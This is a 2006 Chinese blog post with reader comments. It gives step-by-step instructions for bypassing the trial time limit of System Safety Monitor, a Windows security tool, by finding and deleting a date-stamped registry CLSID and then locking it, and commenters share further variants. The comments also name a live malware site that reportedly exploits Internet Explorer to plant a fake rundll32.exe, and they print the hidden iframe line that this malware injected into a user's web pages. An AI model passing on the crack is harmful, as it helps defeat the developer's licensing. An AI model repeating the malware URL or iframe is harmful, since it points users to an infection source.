百度首页 | 百度空间
 
查看文章
 
【更新】SSM最新604版的时间限制破解(12/31更新)
2006-12-29 00:53

 作者:nslog                 ( www.nslog.cn )
 日期:2006/12/29       (转载请保留此申明)
 

     这一两周,SSM又做了更新,出了2.2.0.6032.2.0.604(官方目前最新的版本,截止06/12/29)版本,并且已经出来2.3的beta版了,SSM近来升级还比较频繁。同时可以官方也做了一些小的变动,这样以前589以前的方法找CLSID已经无效了。     

    不过这两个版本的改动实在不大,所以如果有589之类的版本,已经可以用着很好了,它跟杀毒软件不一样,不需要频繁升级病毒包,一般来说,589的版本已经够用了。
    
    但既然有新的版本,也有一些朋友要求了,那就花了点时间跟踪了一下,使用的工具是RegSnap,试验的版本分别来自华军的V2.2.0.603和官方的V2.2.0.604

    SSM V2.2.0.604下载地址: http://link.syssafety.com/download/ssm-2.2.0.604.exe

     这一次的SSM授权信息不是保存在HKEY_CLASSES_ROOT\CLSID下,而是改到HKLM\SOFTWARE\Classes\CLSID\下,也没有一个proxyinfo标识,它的proxy代理设置已经改到HKLM\SOFTWARE\System Safety\System Safety Monitor\ProxyInfo下了,这样以前的根据proxyinfo这个标识来找的办法已经无效了。

    这个CLSID值是随机生成的,每个机器的版本不一样。这个CLSID值只有一个默认值,是DWORD类型的数据,记录安装日期和1900/01/01之间的天数差。所以以前有一些设置注册表权限不让SSM更新,这个办法也无效了。

    用下面这个办法可以找到这个变化的CLSID,因为Windows自带的注册表编辑器无法搜索DWORD类型的数据,所以我们还要找一个小工具来帮忙。

1、下载Register Workshop (可以从下面的地址下已经验证无毒,或者自己找一下)

       http://down.xxjp.org/Software/Catalog161/8172.html

2、计算安装日期和1900相差的天数。
 
    打开Excel,A1单元输入安装系统的日期,如:2006-12-30,A2单元输入:1900-1-1,A3单元输入一个公式:
     =(A1-A2)+1
    然后回车便计算出安装日期和1900/01/01之间的天数:39081

3、运行Register Workshop,然后输入刚才的数值进行查找

     如39081,一般只会在HKEY_CLASSES_ROOT\CLSID\下找到一个,如果没找到,可以把这个值加一或者减一再找一下,一直找到为止.

4、找到这个CLSID值,以后直接删除这个CLSID值便可(设置注册表权限的方式已经无效了)

5、以上方式针对602/603/604均有效,如果有变化,请根据此提示自己摸索一下。

[更新12/31]
1、根据一些朋友提示,查到要分析这个CLSID的值来作为目标
2、增加查找CLSID的方法。
3、
之所以要更新,是不想一个无效的和不成熟的办法一直放在这里。听从一个网友的建议,以后不再写关于SSM破解的文章。


类别:清除方法 | 添加到搜藏 | 浏览() | 评论 (90)
 
最近读者:
 
网友评论:
1
2006-12-29 01:11
真好運 馬上就看到更新
 
2
2006-12-29 01:19
請問下 這是啥來的 ??

父级进程:
路径: E:\WINDOWS\explorer.exe
信息: Windows Explorer (Microsoft Corporation)
子级进程:
路径: E:\WINDOWS\system32\verclsid.exe
信息: Verify Class ID (Microsoft Corporation)
命令行:/S /C {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
 
3
2006-12-29 03:53
楼主,Registry Workshop这个软件可以找出SSM授权信息。我已经尝试过了,这个方法也可以达到效果。
 
4
2006-12-29 09:18
回2楼:这个verclsid是用于在Windows资源管理器实例化COM 对象之前验证COM 对象,如果打了MS06-015这个补丁,就会新增加这个功能.属于合法的,可以添加一下规则.
 
5
2006-12-29 09:30
很好。
 
6
2006-12-29 09:52
我打开SSM时出现,you need to reboot for starting SSM.
这个怎么解决呢??
 
7
2006-12-29 10:06
SSM安装完需要重启的.
 
8
2006-12-29 10:09
感謝 nslog
 
9
2006-12-29 10:21
HKEY_CLASSES_ROOT\CLSID还是有相同的键值,锁定即可
 
10
2006-12-29 10:23
{D59AFE88-48CC-0620-BD96-64EB41D58546}这个键值,每个机器不一样,每个人找出自己的键值,方法是搜索安装日期,注意要转换为常规数值
 
11
2006-12-29 11:11
hotboy,你说你的办法是开机后自动延长,更省事,能不能公布一下。
 
12
2006-12-29 11:23
nslog, 要破解它, 用得著這麼麻煩嗎? 真笨!
 
13
2006-12-29 11:45
回12楼的:每个人能力都是有限的,如果你有更好的办法,请指点一下,谢谢!
 
14
2006-12-29 12:15
有2.3.605了,我没打错,是2.3
 
15
2006-12-29 12:33
ssm-2.2.0.598,我是这个版本的,你这个项和值我注册表里面都不一样,楼主,一定要找出一个大家都能通用的方法。10楼说的对。我是ssm-2.2.0.598版本的,我机子里的值跟你是不一样的。希望尽快解决这个问题。还有我能找到右边的那个,但左边的那个项的确找不出来。一个个去点吗?TAB也不行。
 
16
2006-12-29 12:48
nslog:
我想问下你有没关于关闭网吧服务的东东.有的东西我不敢管啊.特别是那几个用英文描述的.

在此感谢!!
 
17
2006-12-29 13:35
回15楼:598的版本比较容易,请参考另外一篇关于SSM破解的文章。
 
18
2006-12-29 14:49
to:11楼

方法就是右键点权限,读取——拒绝,高级——选删除,其他勾选去掉
 
27
2006-12-30 11:12
不错啊,我刚安装上
 
29
2006-12-30 11:25
没用,没有这外键值.
 
30
2006-12-30 12:07
nslog 你的 BLOG 的文章非常好, 相信也造福了許多人.

但是這種破解的文章就不太恰當了. 想想看, 你的文章如果被別人抄襲, 你心想的感受會不好吧. 為什麼? 因為這是你的心血, 是你努力的成果. 同樣地, SSM 的作者肯定也花了不少精神才寫出這樣的軟件, 如果他知道有人破解, 他會作何感想?

既然 SSM 提供了免費的版本, 何不就用免費版? 何需破解呢? ... 如果免費版真的功能不夠, 那就好花錢買收費的版本.. 再不然, 你自己寫一個 SSM 好了, 寫好之後, 也可以分享給大家使用.

寫這段話, 我沒有惡意, 希望你別介意.
 
31
2006-12-30 12:14
回30楼:非常感谢您的建议,您的建议很有道理,
以后不写此类文章了.
 
32
2006-12-30 14:14
回30 匿名网友
尊重别人的劳动成果当然很重要,但是如果有破解版本,能破解,又何尝不可
在当前破解软件众多,绿色软件层出不穷的情势下
其一,可以鞭笞SSM 的作者通过破解来了解这个软件的缺陷,现在破解软件层出不穷,已是大势所趋,而且有一大部分很大程度上推动了他们软件自身的发展,就象卡巴斯基杀毒软件没有广大卡饭的功劳,没有他们及时发现问题的努力,没有他们找出该软件的破绽,找出该软件的破解,就没有现在世界上2亿4000万用该软件人的支持,而且更好的是卡巴官方还邀请这些破解它软件的人去他那做客并每人送一年时间使用的key.因此只有有了更完善的产品对他们来说才能更好的发展.

其二,至于说有人抄袭nslog的文章我想这是极个别的现象,社会也一样,也有极其个别人犯法吧,但我们并不能全都把他们杀了吧,更好的手段是希望大众去督促,去监督吧.广大的博友还是希望nslog多出新品,多出精品.
其三,匿名网友你说破解让我们自己弄,既然你这么厉害那你帮我们弄个好了.你不是在这里讨论很多吗.
其四,现在很多知名的软件都被广大高手破解了,如AVG-Anti-Spyware7.5.0.50等等我就不多说了,只要你们去网络上搜索没有不可能找到他们破解的方法

总之一句话,我还是希望nslog能拿出
 
33
2006-12-30 14:17
各位nslog的博友们:

希望nslog破解SSM的出来顶下啊!!!

支持一下啊!!!1
 
34
2006-12-30 14:22
我支持,顶了,希望lz能破解SSM 软件更好的方便我们使用,软件业也要你去发展啊.
 
35
2006-12-30 14:25
顶顶顶顶顶顶顶顶!!!!!!!!!!!

支持 33 网友:linbao

最新版本什么时候能出来啊,
 
36
2006-12-30 14:25
无言……
其实懂用SSM的人用RegSnap也应该不成问题。
如果您不懂用RegSnap,请立即删除SSM并安装传统的杀毒软件以保护您的计算机安全。
 
37
2006-12-30 16:22
我用regmon监视syssafe的注册表访问,应该也能达到目的,试下先
 
38
2006-12-30 16:32
nslog
我有个问题 以前我早就装了SSM了 没什么异常
前几天重装了一下系统 结果 我进控制面板调东西
就出现“Windows 无法访问指定设备路径或文件你 可能没有合适的权限访问这个项目”
我百度了下 确实是因为SSM 只有先关了SSM 才能调
请问怎么办啊????
 
39
2006-12-30 16:41
你好,请在SSM的规则—程序中找到rundll32.exe这个进程,然后删除掉,保存一下便可。
因为控制面板实际上是通过rundll32这个程序来调用的,如添加删除程序实际上是运行这个:
rundll32.exe C:\WINDOWS\system32\shell32.dll,Control_RunDLL C:\WINDOWS\system32\appwiz.cpl,添加或删除程序

因为rundll32同时也是很多病毒或者木马的加载方式,所以最好不要建立永久规则。
 
40
2006-12-30 19:14
呵呵 解决了呢
人才啊~~~
谢谢nslog~~
 
43
2006-12-31 00:12
回41楼的朋友:您的留言我已经删除,虽然是在维护我,但12楼的朋友言语还算文明,所以请口下留情.共同维护这个BLOG良好的交流氛围,谢谢你的理解和支持!
 
44
2006-12-31 09:16
了解,360论坛上,看到一个人发的贴,准备发链接地址的,不过今天论坛维护。
他说他有更好的解决my123.com的方法,然后说:"各位想知道不,可我不说",然后,下一贴,又说了同样的话,我就说,“既然不想说,那就永远不要说,也永远不要到这里(360论坛)来”。

也许,我把第X楼看成这样的人了。
在你的日志里,向你道歉.
 
45
2006-12-31 09:17
我在用SSM的时候,发现系统运行一段时间后,一按键盘,电脑就重起。
这是windgb的分析结果
MODULE_NAME: safemon

FAULTING_MODULE: 804d8000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 4592ad3e

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
e148e5f0

CURRENT_IRQL: 2

FAULTING_IP:
nt+f6e70
805cee70 0fb70a movzx ecx,word ptr [edx]

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0xA

LAST_CONTROL_TRANSFER: from 805d7614 to 805cee70

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
 
46
2006-12-31 11:06
我是29号安装的,应该用39080来查找,的确在HKEY_CLASSES_ROOT\CLSID\下找到一个,但是我看到这个CLSID下面还有一些目录是其他软件的一些信息,不知道是否是需要删除的啊????
 
47
2006-12-31 11:09
nslog,关于不继续写破解文章,首先十分同意30楼和36楼的朋友的观点。对于维护原作者正当权益的要求,我无可辩驳。但还是希望能使用破解过的新版软件,呵呵,社会大环境如此,再加上个人的贪欲,相信提供破解方法的人最为理解。

关于“无效的或不成熟的方法”的问题,我觉得,你写这样的文章并不会像你所一贯希望的那样,让“广大”网友免受流氓困扰,因为“广大”网友当中的多数,即便看了你的文章,也顶多是照着做做,真正该如何设置规则之类的事情还是不会;要么是对此类有点技术含量的文章根本提不起兴趣。SSM这种软件的用户根本就不是这样手把手教出来的。你这样写,能惠及的人其实本来已经懂一些系统常识,起码懂得常见进程都是干嘛的,或者最起码的,有意愿、兴趣、决心来搞懂它们。根据我国国情,这样的人是少数。说得不好听点,你的文章对大多数人来讲,即便写得这样浅显了,也仍是对牛弹琴;假使写得没这么浅显,点到关键位置了,对能够成为SSM用户的人来讲,应该也足够了。在不太必要的地方少花费一些心血,文章的质量反而会提高。

还是希望nslog能适时提供一些破解的诀窍。另外,如果能提供SSM一些具体的使用技巧,如常见进程通常都会做什么事,什么进程在
 
48
2006-12-31 11:09
还是希望nslog能适时提供一些破解的诀窍。另外,如果能提供SSM一些具体的使用技巧,如常见进程通常都会做什么事,什么进程在什么情况下尝试进行什么操作的时候应当提高警惕,相信会对更多人有帮助。
 
49
2006-12-31 12:41
锁定注册表功能在606,甚至在新软件607中,同样有效
 
50
2006-12-31 19:41
SSM不增加文件保护的话,偶不准备更新了,还在用不带网络功能的592
 
51
2006-12-31 23:22
回46楼:只删除找到的那一个CLSID值便可,其它千万不要删,可能引起不可预见的问题
回47楼:谢谢你的建议,非常好.我时常也徘徊在这两者之间,写普及性的文章,难度是很高的.但的确是这样,很多人没有兴趣去了解这些.我会适当做一些调整.
回49楼:呵呵...锁住是一个比较通用的办法,但是需要先把那个值删掉,锁住是为了防止软件再更改.难点在于如何找到这个CLSID值.
回50楼:SSM的更新...真的不需要跟那紧,下回直接用2.3或者3.0的吧.
 
52
2007-01-01 00:58
这几天一直不能打开SSM的官方网址,直接使用工具下载也不行,不知什么原因?
 
53
2007-01-01 01:24
台湾地震引起光缆断裂,所以国际访问都受到不同程序影响....
各大网站,电视,报纸都有这条消息...
 
54
2007-01-01 17:18
删除那键值,建议写个批处理,省得使用日期到的时候又要去动注册表。
 
55
2007-01-01 21:29
呵呵~直接把其权限拒绝完全控制即可,每天都会自动往后延迟一天。。。
 
56
2007-01-02 02:59
希望nslog帮我解决
好像最近又出来个新的木马病毒...太变态了
我的ssm都没反应....瑞星报了警....
然后我就点了删除病毒.....然后我电脑里那个rundll32.exe的什么文件就没了

具体的去看下http://www.mostarlighting.com/bbs/dispbbs.asp?boardid=7&ID=120

郁闷啊......
这个比飞雪什么的更变态.....

 
57
2007-01-02 20:08
受教了,谢谢nslog ,顺利搞定,现在是606版.
 
58
2007-01-03 00:30
回56楼:那个网页利用IE漏洞,然后下载rundll32.exe文件到system32目录下,并且把原来的文件名改为rundll32.exe.tmp,然后尝试运行这个rundll32.exe文件.

解决办法:中止所有rundll32.exe进程,然后把system32\dllcache目录下的rundll32.exe复制回来便可.

病毒网址:www.ac66.cn/88/index.htm (仅供试验,如果不开SSM,后果自负)
 
59
2007-01-03 12:12
nslog楼主,你的这句话有歧义,
打开Excel,A1单元输入安装系统的日期,如:2006-12-30,A2单元输入:1900-1-1,A3单元输入一个公式:=(A1-A2)+1中的"安装系统日期"应该改为"SSM安装于系统的日期"
害的我以为我自己安装的整个系统的日期,用了下面这个
1.开始>运行>在打开栏中输入cmd在弹出的DOS窗口再输入systeminfo

2.输出的系统信息中"初始安装日期"一行,就是初始系统安装日期
其实不是,我太笨了.
其实是SSM安装于系统的日期,要是连SSM安装于系统的日期都忘记了那怎么办啊,哈哈

 
61
2007-01-03 15:27
谢谢nslog

rundll32的那个问题解决了.......

不过它把我电脑里的网页文件 htm html asp hph 后续结尾的网页文件都中了毒, 出现了一个代码:<iframehttp://www .ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>

都添加了一行代码......

我电脑里网页文件比较多......手工实在是删不动了.....有什么好一点的办法吗?
比如bat什么的

对了,我不是那个bbs的admin ......我只是搜索到的~~
 
62
2007-01-03 22:11
回59楼: 难道你不会...打开c:\Program Files\System Safety Monitor目录,然后看这个目录的建立日期吗?其实很简单对吧,呵呵,难得糊涂.

回60楼:你的WEB服务器被人种了木马了,我也遇到过.用NTFS权限可以解决这个问题,详情可联系我.用UltraEdit这个工具,用"在文件中替换"这个功能,将那一行整个替换就行了,1分钟搞定:-)
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码:
 

     

©2008 Baidu